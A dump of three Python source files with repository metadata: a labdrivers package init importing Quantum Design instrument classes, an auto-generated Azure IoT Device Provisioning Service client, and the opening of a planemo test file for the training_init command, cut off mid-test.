pbnjeff89/labdrivers
|
1091b9f746a5a011d94cd63abf5010fc8cde1556
|
[
"MIT"
] | 21
|
2016-04-13T20:03:36.000Z
|
2019-09-25T13:00:52.000Z
|
labdrivers/quantumdesign/__init__.py
|
pbnjeff89/labdrivers
|
1091b9f746a5a011d94cd63abf5010fc8cde1556
|
[
"MIT"
] | 3
|
2017-08-30T02:01:27.000Z
|
2020-03-04T01:50:52.000Z
|
from .qdinstrument import Dynacool
from .qdinstrument import Ppms
from .qdinstrument import Svsm
from .qdinstrument import VersaLab
from .qdinstrument import Mpms
| 27.166667
| 34
| 0.846626
| 20
| 163
| 6.9
| 0.4
| 0.57971
| 0.797101
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122699
| 163
| 5
| 35
| 32.6
| 0.965035
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
57fd54e6dd4ff1a9d696286f2c0b23ffd2f79ca3
| 36,245
|
py
|
Python
|
azure-iot-provisioning-servicesdk/azure/iot/provisioning/servicesdk/protocol/provisioning_service_client.py
|
olivakar/azure-iot-sdk-python-preview
|
636855716a362bad1623983026666b5f91c22825
|
[
"MIT"
] | 6
|
2019-03-19T18:53:55.000Z
|
2020-02-23T18:29:57.000Z
|
azure-iot-provisioning-servicesdk/azure/iot/provisioning/servicesdk/protocol/provisioning_service_client.py
|
noopkat/azure-iot-sdk-python-preview
|
f51733e9d3424c33ed86d51e214b20c843716763
|
[
"MIT"
] | null | null | null |
azure-iot-provisioning-servicesdk/azure/iot/provisioning/servicesdk/protocol/provisioning_service_client.py
|
noopkat/azure-iot-sdk-python-preview
|
f51733e9d3424c33ed86d51e214b20c843716763
|
[
"MIT"
] | 1
|
2019-04-11T15:56:50.000Z
|
2019-04-11T15:56:50.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.service_client import SDKClient
from msrest import Configuration, Serializer, Deserializer
from .version import VERSION
from msrest.pipeline import ClientRawResponse
from . import models
class ProvisioningServiceClientConfiguration(Configuration):
    """Configuration for ProvisioningServiceClient.

    Note that all parameters used to create this instance are saved as instance
    attributes.

    :param credentials: Subscription credentials which uniquely identify
     client subscription.
    :type credentials: None
    :param str base_url: Service URL
    """

    def __init__(self, credentials, base_url=None):
        # Credentials are mandatory; fail fast before touching the base class.
        if credentials is None:
            raise ValueError("Parameter 'credentials' must not be None.")
        # Any falsy base_url (None, "") falls back to the local endpoint.
        effective_url = base_url if base_url else "https://localhost"
        super(ProvisioningServiceClientConfiguration, self).__init__(effective_url)
        self.add_user_agent("provisioningserviceclient/{}".format(VERSION))
        self.credentials = credentials
class ProvisioningServiceClient(SDKClient):
"""API for service operations with the Azure IoT Hub Device Provisioning Service
:ivar config: Configuration for client.
:vartype config: ProvisioningServiceClientConfiguration
:param credentials: Subscription credentials which uniquely identify
client subscription.
:type credentials: None
:param str base_url: Service URL
"""
def __init__(self, credentials, base_url=None):
self.config = ProvisioningServiceClientConfiguration(credentials, base_url)
super(ProvisioningServiceClient, self).__init__(self.config.credentials, self.config)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self.api_version = "2018-09-01-preview"
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
def get_individual_enrollment(self, id, custom_headers=None, raw=False, **operation_config):
"""Get a device enrollment record.
:param id: Registration ID.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: IndividualEnrollment or ClientRawResponse if raw=true
:rtype: ~protocol.models.IndividualEnrollment or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.get_individual_enrollment.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("IndividualEnrollment", response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_individual_enrollment.metadata = {"url": "/enrollments/{id}"}
def create_or_update_individual_enrollment(
self, id, enrollment, if_match=None, custom_headers=None, raw=False, **operation_config
):
"""Create or update a device enrollment record.
:param id: The registration ID is alphanumeric, lowercase, and may
contain hyphens.
:type id: str
:param enrollment: The device enrollment record.
:type enrollment: ~protocol.models.IndividualEnrollment
:param if_match: The ETag of the enrollment record.
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: IndividualEnrollment or ClientRawResponse if raw=true
:rtype: ~protocol.models.IndividualEnrollment or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.create_or_update_individual_enrollment.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
header_parameters["Content-Type"] = "application/json; charset=utf-8"
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters["If-Match"] = self._serialize.header("if_match", if_match, "str")
# Construct body
body_content = self._serialize.body(enrollment, "IndividualEnrollment")
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("IndividualEnrollment", response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_or_update_individual_enrollment.metadata = {"url": "/enrollments/{id}"}
def delete_individual_enrollment(
self, id, if_match=None, custom_headers=None, raw=False, **operation_config
):
"""Delete a device enrollment record.
:param id: Registration ID.
:type id: str
:param if_match: The ETag of the enrollment record.
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.delete_individual_enrollment.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters["If-Match"] = self._serialize.header("if_match", if_match, "str")
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_individual_enrollment.metadata = {"url": "/enrollments/{id}"}
def get_enrollment_group(self, id, custom_headers=None, raw=False, **operation_config):
"""Get a device enrollment group.
:param id: Enrollment group ID.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: EnrollmentGroup or ClientRawResponse if raw=true
:rtype: ~protocol.models.EnrollmentGroup or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.get_enrollment_group.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("EnrollmentGroup", response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_enrollment_group.metadata = {"url": "/enrollmentGroups/{id}"}
def create_or_update_enrollment_group(
self,
id,
enrollment_group,
if_match=None,
custom_headers=None,
raw=False,
**operation_config
):
"""Create or update a device enrollment group.
:param id: Enrollment group ID.
:type id: str
:param enrollment_group: The device enrollment group.
:type enrollment_group: ~protocol.models.EnrollmentGroup
:param if_match: The ETag of the enrollment record.
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: EnrollmentGroup or ClientRawResponse if raw=true
:rtype: ~protocol.models.EnrollmentGroup or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.create_or_update_enrollment_group.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
header_parameters["Content-Type"] = "application/json; charset=utf-8"
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters["If-Match"] = self._serialize.header("if_match", if_match, "str")
# Construct body
body_content = self._serialize.body(enrollment_group, "EnrollmentGroup")
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("EnrollmentGroup", response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_or_update_enrollment_group.metadata = {"url": "/enrollmentGroups/{id}"}
def delete_enrollment_group(
self, id, if_match=None, custom_headers=None, raw=False, **operation_config
):
"""Delete a device enrollment group.
:param id: Enrollment group ID.
:type id: str
:param if_match: The ETag of the enrollment group record.
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.delete_enrollment_group.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters["If-Match"] = self._serialize.header("if_match", if_match, "str")
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_enrollment_group.metadata = {"url": "/enrollmentGroups/{id}"}
def get_device_registration_state(self, id, custom_headers=None, raw=False, **operation_config):
"""Gets the device registration state.
:param id: Registration ID.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: DeviceRegistrationState or ClientRawResponse if raw=true
:rtype: ~protocol.models.DeviceRegistrationState or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.get_device_registration_state.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("DeviceRegistrationState", response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_device_registration_state.metadata = {"url": "/registrations/{id}"}
def delete_device_registration_state(
self, id, if_match=None, custom_headers=None, raw=False, **operation_config
):
"""Deletes the device registration.
:param id: Registration ID.
:type id: str
:param if_match: The ETag of the registration status record.
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.delete_device_registration_state.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters["If-Match"] = self._serialize.header("if_match", if_match, "str")
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_device_registration_state.metadata = {"url": "/registrations/{id}"}
def run_bulk_enrollment_operation(
self, bulk_operation, custom_headers=None, raw=False, **operation_config
):
"""Bulk device enrollment operation.
:param bulk_operation: Bulk operation.
:type bulk_operation: ~protocol.models.BulkEnrollmentOperation
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: BulkEnrollmentOperationResult or ClientRawResponse if
raw=true
:rtype: ~protocol.models.BulkEnrollmentOperationResult or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.run_bulk_enrollment_operation.metadata["url"]
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
header_parameters["Content-Type"] = "application/json; charset=utf-8"
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(bulk_operation, "BulkEnrollmentOperation")
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("BulkEnrollmentOperationResult", response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
run_bulk_enrollment_operation.metadata = {"url": "/enrollments"}
def query_individual_enrollments(
self,
query_specification,
x_ms_max_item_count=None,
x_ms_continuation=None,
custom_headers=None,
raw=False,
**operation_config
):
"""Query the device enrollment records.
:param query_specification: The query specification.
:type query_specification: ~protocol.models.QuerySpecification
:param x_ms_max_item_count: pageSize
:type x_ms_max_item_count: int
:param x_ms_continuation: continuation token
:type x_ms_continuation: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype: list[~protocol.models.IndividualEnrollment] or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.query_individual_enrollments.metadata["url"]
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
header_parameters["Content-Type"] = "application/json; charset=utf-8"
if custom_headers:
header_parameters.update(custom_headers)
if x_ms_max_item_count is not None:
header_parameters["x-ms-max-item-count"] = self._serialize.header(
"x_ms_max_item_count", x_ms_max_item_count, "int"
)
if x_ms_continuation is not None:
header_parameters["x-ms-continuation"] = self._serialize.header(
"x_ms_continuation", x_ms_continuation, "str"
)
# Construct body
body_content = self._serialize.body(query_specification, "QuerySpecification")
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
header_dict = {}
if response.status_code == 200:
deserialized = self._deserialize("[IndividualEnrollment]", response)
header_dict = {
"x-ms-continuation": "str",
"x-ms-max-item-count": "int",
"x-ms-item-type": "str",
}
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
client_raw_response.add_headers(header_dict)
return client_raw_response
return deserialized
query_individual_enrollments.metadata = {"url": "/enrollments/query"}
def get_individual_enrollment_attestation_mechanism(
self, id, custom_headers=None, raw=False, **operation_config
):
"""Get the attestation mechanism in the device enrollment record.
:param id: Registration ID.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: AttestationMechanism or ClientRawResponse if raw=true
:rtype: ~protocol.models.AttestationMechanism or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.get_individual_enrollment_attestation_mechanism.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("AttestationMechanism", response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_individual_enrollment_attestation_mechanism.metadata = {
"url": "/enrollments/{id}/attestationmechanism"
}
def query_enrollment_groups(
self,
query_specification,
x_ms_max_item_count=None,
x_ms_continuation=None,
custom_headers=None,
raw=False,
**operation_config
):
"""Query the device enrollment groups.
:param query_specification: The query specification.
:type query_specification: ~protocol.models.QuerySpecification
:param x_ms_max_item_count: pageSize
:type x_ms_max_item_count: int
:param x_ms_continuation: continuation token
:type x_ms_continuation: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype: list[~protocol.models.EnrollmentGroup] or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.query_enrollment_groups.metadata["url"]
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
header_parameters["Content-Type"] = "application/json; charset=utf-8"
if custom_headers:
header_parameters.update(custom_headers)
if x_ms_max_item_count is not None:
header_parameters["x-ms-max-item-count"] = self._serialize.header(
"x_ms_max_item_count", x_ms_max_item_count, "int"
)
if x_ms_continuation is not None:
header_parameters["x-ms-continuation"] = self._serialize.header(
"x_ms_continuation", x_ms_continuation, "str"
)
# Construct body
body_content = self._serialize.body(query_specification, "QuerySpecification")
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
header_dict = {}
if response.status_code == 200:
deserialized = self._deserialize("[EnrollmentGroup]", response)
header_dict = {
"x-ms-continuation": "str",
"x-ms-max-item-count": "int",
"x-ms-item-type": "str",
}
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
client_raw_response.add_headers(header_dict)
return client_raw_response
return deserialized
query_enrollment_groups.metadata = {"url": "/enrollmentGroups/query"}
def get_enrollment_group_attestation_mechanism(
self, id, custom_headers=None, raw=False, **operation_config
):
"""Get the attestation mechanism in the device enrollment group record.
:param id: Enrollment group ID
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: AttestationMechanism or ClientRawResponse if raw=true
:rtype: ~protocol.models.AttestationMechanism or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.get_enrollment_group_attestation_mechanism.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("AttestationMechanism", response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_enrollment_group_attestation_mechanism.metadata = {
"url": "/enrollmentGroups/{id}/attestationmechanism"
}
def query_device_registration_states(
    self, id, custom_headers=None, raw=False, **operation_config
):
    """Gets the registration state of devices in this enrollmentGroup.

    :param id: Enrollment group ID.
    :type id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: list or ClientRawResponse if raw=true
    :rtype: list[~protocol.models.DeviceRegistrationState] or
     ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
    """
    # Expand the enrollment-group id into the operation's URL template.
    url = self._client.format_url(
        self.query_device_registration_states.metadata["url"],
        id=self._serialize.url("id", id, "str"),
    )
    # Only the service api-version travels in the query string.
    query_parameters = {
        "api-version": self._serialize.query(
            "self.api_version", self.api_version, "str"
        )
    }
    # JSON is the only representation the service produces here; callers
    # may extend the headers with their own.
    header_parameters = {"Accept": "application/json"}
    if custom_headers:
        header_parameters.update(custom_headers)
    # The query endpoint is invoked with POST even though it only reads.
    request = self._client.post(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)
    # Any non-200 status is surfaced as a service error exception.
    if response.status_code != 200:
        raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
    deserialized = self._deserialize("[DeviceRegistrationState]", response)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
query_device_registration_states.metadata = {"url": "/registrations/{id}/query"}
| 40.361915
| 116
| 0.671099
| 3,646
| 36,245
| 6.459956
| 0.052935
| 0.045514
| 0.021653
| 0.021229
| 0.904683
| 0.892795
| 0.887063
| 0.870675
| 0.862862
| 0.86248
| 0
| 0.003236
| 0.241192
| 36,245
| 897
| 117
| 40.406912
| 0.853143
| 0.316982
| 0
| 0.770302
| 1
| 0
| 0.093615
| 0.015057
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037123
| false
| 0
| 0.011601
| 0
| 0.111369
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
17cb65026e91ab819e5e04fdf6f7ec4a60c4e4b9
| 5,144
|
py
|
Python
|
tests/test_cmd_training_init.py
|
pvanheus/planemo
|
12c4256325bb1b274dcd40d64b91c1f832cf49b1
|
[
"CC-BY-3.0"
] | 73
|
2015-01-03T15:09:26.000Z
|
2022-03-30T23:52:55.000Z
|
tests/test_cmd_training_init.py
|
pvanheus/planemo
|
12c4256325bb1b274dcd40d64b91c1f832cf49b1
|
[
"CC-BY-3.0"
] | 958
|
2015-01-02T08:27:45.000Z
|
2022-03-23T14:51:51.000Z
|
tests/test_cmd_training_init.py
|
jmchilton/planemo
|
d352a085fe10cb6b7c1384663b114201da42d97b
|
[
"CC-BY-3.0"
] | 84
|
2015-01-06T18:27:28.000Z
|
2021-11-18T01:58:17.000Z
|
"""Tests for the ``training_init`` command."""
import os
from .test_utils import (
CliTestCase,
skip_if_environ,
TEST_DATA_DIR
)
class CmdTrainingInitTestCase(CliTestCase):
    """Container class defining test cases for the ``training_init`` command."""

    def _check_training_init(self, options, expected_exit_code):
        """Invoke ``training_init`` with ``options`` and assert its exit code."""
        self._check_exit_code(["training_init"] + options, exit_code=expected_exit_code)

    @skip_if_environ("PLANEMO_SKIP_GALAXY_TESTS")
    def test_training_init_command_by_default(self):
        """Test training_init command with only topic name."""
        with self._isolate():
            self._check_training_init(["--topic_name", "test"], 0)

    @skip_if_environ("PLANEMO_SKIP_GALAXY_TESTS")
    def test_training_init_command_topic(self):
        """Test training_init command to create new topic."""
        with self._isolate():
            # A fully specified topic is accepted.
            self._check_training_init(
                [
                    "--topic_name", "test",
                    "--topic_title", "Topic title",
                    "--topic_target", "use",
                    "--topic_summary", "Summary",
                ],
                0,
            )
            # An invalid topic target is rejected by argument parsing.
            self._check_training_init(
                [
                    "--topic_name", "test",
                    "--topic_title", "Topic title",
                    "--topic_target", "test",
                    "--topic_summary", "Summary",
                ],
                2,
            )

    @skip_if_environ("PLANEMO_SKIP_GALAXY_TESTS")
    def test_training_init_command_tutorial_no_topic(self):
        """Test training_init command with tutorial but no topic."""
        with self._isolate():
            # A tutorial name without a topic name is rejected.
            self._check_training_init(["--tutorial_name", "test"], 2)

    @skip_if_environ("PLANEMO_SKIP_GALAXY_TESTS")
    def test_training_init_command_tutorial(self):
        """Test training_init command to create new tutorial."""
        with self._isolate():
            self._check_training_init(
                [
                    "--topic_name", "test",
                    "--tutorial_name", "test",
                    "--tutorial_title", "Title of the tutorial",
                    "--hands_on",
                    "--slides",
                ],
                0,
            )

    @skip_if_environ("PLANEMO_SKIP_GALAXY_TESTS")
    def test_training_init_command_tutorial_zenodo(self):
        """Test training_init command to create new tutorial with zenodo."""
        with self._isolate():
            datatype = os.path.join(TEST_DATA_DIR, "training_datatypes.yaml")
            # Without a datatype mapping the zenodo import fails.
            self._check_training_init(
                [
                    "--topic_name", "test",
                    "--tutorial_name", "test",
                    "--zenodo_link", "https://zenodo.org/record/1321885",
                ],
                1,
            )
            # With the datatype mapping supplied the import succeeds.
            self._check_training_init(
                [
                    "--topic_name", "test",
                    "--tutorial_name", "test",
                    "--zenodo_link", "https://zenodo.org/record/1321885",
                    "--datatypes", datatype,
                ],
                0,
            )

    @skip_if_environ("PLANEMO_SKIP_GALAXY_TESTS")
    def test_training_init_command_tutorial_local_wf(self):
        """Test training_init command to create new tutorial with local workflow."""
        with self._isolate():
            test_workflow = os.path.join(TEST_DATA_DIR, "test_workflow_1.ga")
            self._check_training_init(
                [
                    "--topic_name", "test",
